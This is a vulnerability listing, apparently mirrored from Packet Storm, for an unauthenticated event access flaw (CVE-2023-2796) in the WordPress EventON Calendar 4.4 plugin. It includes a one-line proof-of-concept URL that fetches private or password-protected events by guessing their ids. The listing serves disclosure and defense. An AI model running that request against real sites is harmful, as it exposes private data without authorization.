Lucene search
Miguel SantarenoPACKETSTORM:173984HistoryAug 04, 2023 - 12:00 a.m.
WordPress EventON Calendar 4.4 Insecure Direct Object Reference
2023-08-0400:00:00
Miguel Santareno
packetstormsecurity.com
156
wordpress plugin
eventon calendar
unauthenticated access
object reference
insecure
direct
exploit
vulnerability
cve-2023-2796
0.029 Low
EPSS
Percentile
90.8%
`# Exploit Title: Wordpress Plugin EventON Calendar 4.4 - Unauthenticated Event Access
# Date: 03.08.2023
# Exploit Author: Miguel Santareno
# Vendor Homepage: https://www.myeventon.com/
# Version: 4.4
# Tested on: Google and Firefox latest version
# CVE : CVE-2023-2796
# 1. Description
The plugin lacks authentication and authorization in its eventon_ics_download ajax action, allowing unauthenticated visitors to access private and password protected Events by guessing their numeric id.
# 2. Proof of Concept (PoC)
Proof of Concept:
https://example.com/wp-admin/admin-ajax.php?action=eventon_ics_download&event_id=value
`
Related
wpvulndb
wpvulndb
EventON < 2.1.2 - Unauthenticated Event Access
2023-06-19 00:00:00
cve
cve
CVE-2023-2796
2023-07-10 16:15:51
cvelist
cvelist
CVE-2023-2796 EventON < 2.1.2 - Unauthenticated Event Access
2023-07-10 12:40:07
nuclei
nuclei
EventON <= 2.1 - Missing Authorization
2023-07-11 12:32:11
EventON (Free < 2.2.8, Premium < 4.5.5) - Information Disclosure
2024-04-28 06:04:28
nvd
nvd
CVE-2023-2796
2023-07-10 16:15:51
zdt
zdt
prion
prion
Authorization
2023-07-10 16:15:00
wpexploit
wpexploit
EventON < 2.1.2 - Unauthenticated Event Access
2023-06-19 00:00:00
exploitdb
exploitdb
Wordpress Plugin EventON Calendar 4.4 - Unauthenticated Event Access
2023-08-04 00:00:00
wordfence
wordfence